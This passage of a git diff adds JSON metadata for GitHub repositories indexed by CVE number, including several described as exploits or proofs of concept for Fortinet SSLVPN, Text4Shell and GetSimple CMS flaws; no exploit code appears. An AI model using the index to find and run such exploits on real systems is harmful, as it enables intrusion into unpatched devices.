+ "full_name": "yosef0x01\/CVE-2022-41544",
+ "owner": {
+ "login": "yosef0x01",
+ "id": 96077889,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96077889?v=4",
+ "html_url": "https:\/\/github.com\/yosef0x01"
+ },
+ "html_url": "https:\/\/github.com\/yosef0x01\/CVE-2022-41544",
+ "description": "Exploit script for CVE-2022-41544 - RCE in get-simple CMS",
+ "fork": false,
+ "created_at": "2023-05-15T15:24:55Z",
+ "updated_at": "2024-01-12T21:29:35Z",
+ "pushed_at": "2023-05-15T21:19:06Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-41876.json b/2022/CVE-2022-41876.json
new file mode 100644
index 0000000000..48a6f970e8
--- /dev/null
+++ b/2022/CVE-2022-41876.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 617083370,
+ "name": "CVE-2022-41876",
+ "full_name": "Skileau\/CVE-2022-41876",
+ "owner": {
+ "login": "Skileau",
+ "id": 83423277,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83423277?v=4",
+ "html_url": "https:\/\/github.com\/Skileau"
+ },
+ "html_url": "https:\/\/github.com\/Skileau\/CVE-2022-41876",
+ "description": "PoC for CVE-2022-41876",
+ "fork": false,
+ "created_at": "2023-03-21T17:05:07Z",
+ "updated_at": "2023-06-06T17:38:25Z",
+ "pushed_at": "2023-03-24T11:20:21Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-41903.json b/2022/CVE-2022-41903.json
new file mode 100644
index 0000000000..3cf6d05703
--- /dev/null
+++ b/2022/CVE-2022-41903.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 593531640,
+ "name": "git-cveissues",
+ "full_name": "sondermc\/git-cveissues",
+ "owner": {
+ "login": "sondermc",
+ "id": 9403395,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9403395?v=4",
+ "html_url": "https:\/\/github.com\/sondermc"
+ },
+ "html_url": "https:\/\/github.com\/sondermc\/git-cveissues",
+ "description": "vulnerabilities, CVE-2022-41903, and CVE-2022-23521, that affect versions 2.39 and older. Git for Windows was also patched to address an additional, Windows-specific issue known as CVE-2022-41953.",
+ "fork": false,
+ "created_at": "2023-01-26T08:34:53Z",
+ "updated_at": "2023-01-26T08:47:29Z",
+ "pushed_at": "2023-01-31T07:52:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-41966.json b/2022/CVE-2022-41966.json
new file mode 100644
index 0000000000..55a692409a
--- /dev/null
+++ b/2022/CVE-2022-41966.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 585766378,
+ "name": "Xstream_cve-2022-41966",
+ "full_name": "111ddea\/Xstream_cve-2022-41966",
+ "owner": {
+ "login": "111ddea",
+ "id": 41444127,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41444127?v=4",
+ "html_url": "https:\/\/github.com\/111ddea"
+ },
+ "html_url": "https:\/\/github.com\/111ddea\/Xstream_cve-2022-41966",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-06T02:37:07Z",
+ "updated_at": "2023-01-19T05:36:46Z",
+ "pushed_at": "2023-01-06T02:42:53Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-42475.json b/2022/CVE-2022-42475.json
new file mode 100644
index 0000000000..b88e14287c
--- /dev/null
+++ b/2022/CVE-2022-42475.json
@@ -0,0 +1,216 @@
+[
+ {
+ "id": 590172933,
+ "name": "ioc-cve-2022-42475",
+ "full_name": "bryanster\/ioc-cve-2022-42475",
+ "owner": {
+ "login": "bryanster",
+ "id": 45668775,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45668775?v=4",
+ "html_url": "https:\/\/github.com\/bryanster"
+ },
+ "html_url": "https:\/\/github.com\/bryanster\/ioc-cve-2022-42475",
+ "description": "test for the ioc described for FG-IR-22-398",
+ "fork": false,
+ "created_at": "2023-01-17T20:11:04Z",
+ "updated_at": "2023-05-14T12:04:07Z",
+ "pushed_at": "2023-05-14T13:22:57Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2022-42475",
+ "fortigate-firewall",
+ "fortinet"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 605510069,
+ "name": "cve-2022-42475",
+ "full_name": "scrt\/cve-2022-42475",
+ "owner": {
+ "login": "scrt",
+ "id": 5999514,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5999514?v=4",
+ "html_url": "https:\/\/github.com\/scrt"
+ },
+ "html_url": "https:\/\/github.com\/scrt\/cve-2022-42475",
+ "description": "POC code to exploit the Heap overflow in Fortinet's SSLVPN daemon",
+ "fork": false,
+ "created_at": "2023-02-23T10:04:58Z",
+ "updated_at": "2024-01-25T01:20:55Z",
+ "pushed_at": "2023-03-14T08:41:51Z",
+ "stargazers_count": 105,
+ "watchers_count": 105,
+ "has_discussions": false,
+ "forks_count": 28,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 28,
+ "watchers": 105,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 614608660,
+ "name": "cve-2022-42475",
+ "full_name": "Amir-hy\/cve-2022-42475",
+ "owner": {
+ "login": "Amir-hy",
+ "id": 24714998,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24714998?v=4",
+ "html_url": "https:\/\/github.com\/Amir-hy"
+ },
+ "html_url": "https:\/\/github.com\/Amir-hy\/cve-2022-42475",
+ "description": "FortiOS buffer overflow vulnerability",
+ "fork": false,
+ "created_at": "2023-03-16T00:05:30Z",
+ "updated_at": "2023-06-14T15:03:16Z",
+ "pushed_at": "2023-03-16T00:05:33Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 617289614,
+ "name": "cve-2022-42475-Fortinet",
+ "full_name": "Mustafa1986\/cve-2022-42475-Fortinet",
+ "owner": {
+ "login": "Mustafa1986",
+ "id": 27927358,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27927358?v=4",
+ "html_url": "https:\/\/github.com\/Mustafa1986"
+ },
+ "html_url": "https:\/\/github.com\/Mustafa1986\/cve-2022-42475-Fortinet",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-22T04:26:22Z",
+ "updated_at": "2023-03-22T04:27:35Z",
+ "pushed_at": "2023-03-22T04:27:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 617811153,
+ "name": "CVE-2022-42475-RCE-POC",
+ "full_name": "3yujw7njai\/CVE-2022-42475-RCE-POC",
+ "owner": {
+ "login": "3yujw7njai",
+ "id": 7390055,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4",
+ "html_url": "https:\/\/github.com\/3yujw7njai"
+ },
+ "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2022-42475-RCE-POC",
+ "description": "CVE-2022-42475 飞塔RCE漏洞 POC",
+ "fork": false,
+ "created_at": "2023-03-23T06:48:14Z",
+ "updated_at": "2024-06-26T01:15:25Z",
+ "pushed_at": "2023-03-23T06:59:22Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 633227706,
+ "name": "cve-2022-42475",
+ "full_name": "natceil\/cve-2022-42475",
+ "owner": {
+ "login": "natceil",
+ "id": 62095406,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62095406?v=4",
+ "html_url": "https:\/\/github.com\/natceil"
+ },
+ "html_url": "https:\/\/github.com\/natceil\/cve-2022-42475",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-27T03:47:14Z",
+ "updated_at": "2023-04-27T03:51:54Z",
+ "pushed_at": "2023-04-27T04:20:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 656889059,
+ "name": "CVE-2022-42475",
+ "full_name": "0xhaggis\/CVE-2022-42475",
+ "owner": {
+ "login": "0xhaggis",
+ "id": 6735009,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6735009?v=4",
+ "html_url": "https:\/\/github.com\/0xhaggis"
+ },
+ "html_url": "https:\/\/github.com\/0xhaggis\/CVE-2022-42475",
+ "description": "An exploit for CVE-2022-42475, a pre-authentication heap overflow in Fortinet networking products",
+ "fork": false,
+ "created_at": "2023-06-21T21:22:35Z",
+ "updated_at": "2024-06-16T09:28:13Z",
+ "pushed_at": "2023-06-21T21:24:52Z",
+ "stargazers_count": 30,
+ "watchers_count": 30,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 30,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-42703.json b/2022/CVE-2022-42703.json
index bf9599e647..17c713f8ed 100644
--- a/2022/CVE-2022-42703.json
+++ b/2022/CVE-2022-42703.json
@@ -1,4 +1,34 @@
[
+ {
+ "id": 661279501,
+ "name": "hbp-attack-demo",
+ "full_name": "Squirre17\/hbp-attack-demo",
+ "owner": {
+ "login": "Squirre17",
+ "id": 79578430,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79578430?v=4",
+ "html_url": "https:\/\/github.com\/Squirre17"
+ },
+ "html_url": "https:\/\/github.com\/Squirre17\/hbp-attack-demo",
+ "description": "Linux kernel hbp exploit method demo. (i.e. the degradation version of CVE-2022-42703)",
+ "fork": false,
+ "created_at": "2023-07-02T10:58:46Z",
+ "updated_at": "2023-09-06T06:47:44Z",
+ "pushed_at": "2023-07-02T12:59:37Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 701197900,
"name": "linux-4.1.15_CVE-2022-42703",
diff --git a/2022/CVE-2022-42864.json b/2022/CVE-2022-42864.json
new file mode 100644
index 0000000000..72a17f3f53
--- /dev/null
+++ b/2022/CVE-2022-42864.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 591057092,
+ "name": "CVE-2022-42864",
+ "full_name": "Muirey03\/CVE-2022-42864",
+ "owner": {
+ "login": "Muirey03",
+ "id": 31448720,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31448720?v=4",
+ "html_url": "https:\/\/github.com\/Muirey03"
+ },
+ "html_url": "https:\/\/github.com\/Muirey03\/CVE-2022-42864",
+ "description": "Proof-of-concept for the CVE-2022-42864 IOHIDFamily race condition",
+ "fork": false,
+ "created_at": "2023-01-19T20:36:49Z",
+ "updated_at": "2024-05-27T09:51:37Z",
+ "pushed_at": "2023-01-20T17:58:39Z",
+ "stargazers_count": 61,
+ "watchers_count": 61,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 61,
+ "score": 0,
+ "subscribers_count": 5
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-42889.json b/2022/CVE-2022-42889.json
index 0d1ea9c095..e7e8d40dd4 100644
--- a/2022/CVE-2022-42889.json
+++ b/2022/CVE-2022-42889.json
@@ -1079,6 +1079,186 @@
"score": 0,
"subscribers_count": 0
},
+ {
+ "id": 607430692,
+ "name": "text4shell-cve-2022-42889",
+ "full_name": "devenes\/text4shell-cve-2022-42889",
+ "owner": {
+ "login": "devenes",
+ "id": 66560757,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66560757?v=4",
+ "html_url": "https:\/\/github.com\/devenes"
+ },
+ "html_url": "https:\/\/github.com\/devenes\/text4shell-cve-2022-42889",
+ "description": "Kubernetes Lab for CVE-2022-42889",
+ "fork": false,
+ "created_at": "2023-02-28T00:32:01Z",
+ "updated_at": "2023-02-28T01:34:25Z",
+ "pushed_at": "2023-02-28T11:43:41Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 608352501,
+ "name": "text4shell",
+ "full_name": "hotblac\/text4shell",
+ "owner": {
+ "login": "hotblac",
+ "id": 4406140,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4406140?v=4",
+ "html_url": "https:\/\/github.com\/hotblac"
+ },
+ "html_url": "https:\/\/github.com\/hotblac\/text4shell",
+ "description": "A demonstration of CVE-2022-42889 (text4shell) remote code execution vulnerability",
+ "fork": false,
+ "created_at": "2023-03-01T20:56:37Z",
+ "updated_at": "2023-03-01T20:57:17Z",
+ "pushed_at": "2023-03-12T17:34:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 623655257,
+ "name": "CVE-2022-42889",
+ "full_name": "necroteddy\/CVE-2022-42889",
+ "owner": {
+ "login": "necroteddy",
+ "id": 37003131,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37003131?v=4",
+ "html_url": "https:\/\/github.com\/necroteddy"
+ },
+ "html_url": "https:\/\/github.com\/necroteddy\/CVE-2022-42889",
+ "description": "docker for CVE-2022-42889",
+ "fork": false,
+ "created_at": "2023-04-04T20:08:08Z",
+ "updated_at": "2023-04-19T05:53:19Z",
+ "pushed_at": "2023-04-19T05:53:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 625082348,
+ "name": "cve-2022-42889-text4shell-docker",
+ "full_name": "ReachabilityOrg\/cve-2022-42889-text4shell-docker",
+ "owner": {
+ "login": "ReachabilityOrg",
+ "id": 129769214,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129769214?v=4",
+ "html_url": "https:\/\/github.com\/ReachabilityOrg"
+ },
+ "html_url": "https:\/\/github.com\/ReachabilityOrg\/cve-2022-42889-text4shell-docker",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-08T02:47:55Z",
+ "updated_at": "2023-04-08T02:48:07Z",
+ "pushed_at": "2023-04-11T15:43:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 625424909,
+ "name": "cve-2022-42889-text4shell-docker",
+ "full_name": "dgor2023\/cve-2022-42889-text4shell-docker",
+ "owner": {
+ "login": "dgor2023",
+ "id": 130265095,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130265095?v=4",
+ "html_url": "https:\/\/github.com\/dgor2023"
+ },
+ "html_url": "https:\/\/github.com\/dgor2023\/cve-2022-42889-text4shell-docker",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-09T04:09:34Z",
+ "updated_at": "2023-04-09T04:09:46Z",
+ "pushed_at": "2023-04-12T02:32:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 629556451,
+ "name": "cve-2022-42889-text4shell",
+ "full_name": "Dima2021\/cve-2022-42889-text4shell",
+ "owner": {
+ "login": "Dima2021",
+ "id": 61808880,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61808880?v=4",
+ "html_url": "https:\/\/github.com\/Dima2021"
+ },
+ "html_url": "https:\/\/github.com\/Dima2021\/cve-2022-42889-text4shell",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-18T14:49:45Z",
+ "updated_at": "2023-04-18T15:01:22Z",
+ "pushed_at": "2023-04-18T15:12:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 630818917,
"name": "cve-2022-42889-text4shell",
@@ -1139,6 +1319,36 @@
"score": 0,
"subscribers_count": 0
},
+ {
+ "id": 659148388,
+ "name": "CVE-2022-42889-Text4Shell-POC",
+ "full_name": "gustanini\/CVE-2022-42889-Text4Shell-POC",
+ "owner": {
+ "login": "gustanini",
+ "id": 47717581,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47717581?v=4",
+ "html_url": "https:\/\/github.com\/gustanini"
+ },
+ "html_url": "https:\/\/github.com\/gustanini\/CVE-2022-42889-Text4Shell-POC",
+ "description": "This repository contains a Python script to automate the process of testing for a vulnerability known as Text4Shell, referenced under the CVE id: CVE-2022-42889. ",
+ "fork": false,
+ "created_at": "2023-06-27T08:29:24Z",
+ "updated_at": "2024-05-13T21:14:40Z",
+ "pushed_at": "2023-06-27T09:01:14Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 2
+ },
{
"id": 687770707,
"name": "CVE-2022-42889",
diff --git a/2022/CVE-2022-42896.json b/2022/CVE-2022-42896.json
new file mode 100644
index 0000000000..9fc576cd67
--- /dev/null
+++ b/2022/CVE-2022-42896.json
@@ -0,0 +1,152 @@
+[
+ {
+ "id": 623797649,
+ "name": "linux-4.19.72_CVE-2022-42896",
+ "full_name": "Satheesh575555\/linux-4.19.72_CVE-2022-42896",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/linux-4.19.72_CVE-2022-42896",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-05T05:33:09Z",
+ "updated_at": "2023-04-05T06:24:18Z",
+ "pushed_at": "2023-04-05T05:36:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 623842429,
+ "name": "kernel_v4.19.72_CVE-2022-42896_old",
+ "full_name": "hshivhare67\/kernel_v4.19.72_CVE-2022-42896_old",
+ "owner": {
+ "login": "hshivhare67",
+ "id": 67005408,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4",
+ "html_url": "https:\/\/github.com\/hshivhare67"
+ },
+ "html_url": "https:\/\/github.com\/hshivhare67\/kernel_v4.19.72_CVE-2022-42896_old",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-05T07:51:32Z",
+ "updated_at": "2023-04-06T05:17:04Z",
+ "pushed_at": "2023-04-06T11:21:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 623871240,
+ "name": "linux-4.19.72_CVE-2022-42896",
+ "full_name": "Trinadh465\/linux-4.19.72_CVE-2022-42896",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.19.72_CVE-2022-42896",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-05T09:10:38Z",
+ "updated_at": "2023-04-05T09:17:08Z",
+ "pushed_at": "2023-04-05T10:40:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 624412266,
+ "name": "kernel_v4.19.72_CVE-2022-42896_new",
+ "full_name": "hshivhare67\/kernel_v4.19.72_CVE-2022-42896_new",
+ "owner": {
+ "login": "hshivhare67",
+ "id": 67005408,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4",
+ "html_url": "https:\/\/github.com\/hshivhare67"
+ },
+ "html_url": "https:\/\/github.com\/hshivhare67\/kernel_v4.19.72_CVE-2022-42896_new",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-06T12:12:27Z",
+ "updated_at": "2023-04-06T12:24:04Z",
+ "pushed_at": "2023-04-07T06:18:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 624531158,
+ "name": "kernel_v4.19.72_CVE-2022-42896",
+ "full_name": "himanshu667\/kernel_v4.19.72_CVE-2022-42896",
+ "owner": {
+ "login": "himanshu667",
+ "id": 130066224,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130066224?v=4",
+ "html_url": "https:\/\/github.com\/himanshu667"
+ },
+ "html_url": "https:\/\/github.com\/himanshu667\/kernel_v4.19.72_CVE-2022-42896",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-06T17:17:25Z",
+ "updated_at": "2023-04-06T17:17:25Z",
+ "pushed_at": "2023-04-06T17:17:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-4304.json b/2022/CVE-2022-4304.json
new file mode 100644
index 0000000000..6f8a9055c5
--- /dev/null
+++ b/2022/CVE-2022-4304.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 631842494,
+ "name": "Openssl-1.1.1g_CVE-2022-4304",
+ "full_name": "Trinadh465\/Openssl-1.1.1g_CVE-2022-4304",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/Openssl-1.1.1g_CVE-2022-4304",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-24T07:15:33Z",
+ "updated_at": "2023-04-24T07:18:06Z",
+ "pushed_at": "2023-04-24T07:18:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-43293.json b/2022/CVE-2022-43293.json
new file mode 100644
index 0000000000..9f4288995a
--- /dev/null
+++ b/2022/CVE-2022-43293.json
@@ -0,0 +1,53 @@
+[
+ {
+ "id": 624878736,
+ "name": "CVE-2022-43293",
+ "full_name": "LucaBarile\/CVE-2022-43293",
+ "owner": {
+ "login": "LucaBarile",
+ "id": 74877659,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74877659?v=4",
+ "html_url": "https:\/\/github.com\/LucaBarile"
+ },
+ "html_url": "https:\/\/github.com\/LucaBarile\/CVE-2022-43293",
+ "description": "Exploit and report for CVE-2022-43293",
+ "fork": false,
+ "created_at": "2023-04-07T13:38:27Z",
+ "updated_at": "2023-04-07T16:47:13Z",
+ "pushed_at": "2023-04-07T15:12:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0-day",
+ "arbitrary-file-overwrite",
+ "arbitrary-file-write",
+ "cng-sys",
+ "denial-of-service",
+ "disclosure",
+ "exploit",
+ "impersonation",
+ "link-following",
+ "link-following-attack",
+ "mount-point",
+ "poc",
+ "proof-of-concept",
+ "symbolic-link",
+ "vulnerability",
+ "wacom",
+ "wacom-vulnerability",
+ "windows-denial-of-service",
+ "write-up",
+ "zero-day"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-43343.json b/2022/CVE-2022-43343.json
new file mode 100644
index 0000000000..e84c92370d
--- /dev/null
+++ b/2022/CVE-2022-43343.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 595861738,
+ "name": "CVE-2022-43343",
+ "full_name": "Halcy0nic\/CVE-2022-43343",
+ "owner": {
+ "login": "Halcy0nic",
+ "id": 42481692,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4",
+ "html_url": "https:\/\/github.com\/Halcy0nic"
+ },
+ "html_url": "https:\/\/github.com\/Halcy0nic\/CVE-2022-43343",
+ "description": "Proof of concept for (CVE-2022-43343)",
+ "fork": false,
+ "created_at": "2023-02-01T00:33:57Z",
+ "updated_at": "2023-02-01T00:33:57Z",
+ "pushed_at": "2023-02-01T00:54:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
